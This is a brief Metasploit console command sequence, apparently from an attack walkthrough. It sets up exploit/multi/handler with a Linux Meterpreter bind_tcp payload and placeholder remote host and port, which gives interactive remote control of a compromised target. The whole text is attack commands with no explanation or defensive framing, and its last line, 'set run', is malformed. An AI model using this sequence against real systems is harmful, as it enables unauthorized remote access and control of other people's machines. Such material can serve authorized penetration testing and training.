msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > set payload linux/meterpreter/bind_tcp msf exploit(multi/handler) > set rhost <ip_remote> msf exploit(multi/handler) > set rport <port_remote> msf exploit(multi/handler) > set run